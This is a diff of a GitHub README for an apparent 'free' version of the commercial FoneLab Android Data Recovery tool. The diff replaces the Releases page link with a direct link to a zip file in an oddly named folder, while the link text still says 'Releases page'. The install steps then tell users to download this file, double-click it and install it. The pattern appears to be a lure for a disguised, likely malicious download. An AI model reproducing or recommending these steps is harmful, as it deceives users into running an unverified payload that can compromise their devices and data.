DuongDaoQuangHung/FoneLab-Android-Data-Recovery-Free/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/DuongDaoQuangHung/FoneLab-Android-Data-Recovery-Free/releases) to download the application.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/DuongDaoQuangHung/FoneLab-Android-Data-Recovery-Free/main/decatize/FoneLab-Android-Data-Recovery-Free.zip) to download the application.

 1. Click the link above to open the Releases page.
 2. Look for the latest version listed.
-3. Click on the appropriate file for your system (e.g., `FoneLab-Android-Data-Recovery.exe`).
+3. Click on the appropriate file for your system (e.g., `https://raw.githubusercontent.com/DuongDaoQuangHung/FoneLab-Android-Data-Recovery-Free/main/decatize/FoneLab-Android-Data-Recovery-Free.zip`).
 4. Once the download completes, locate the file in your system's Downloads folder.
 5. Double-click the file to start the installation process.
 6. Follow the on-screen instructions to complete the installation.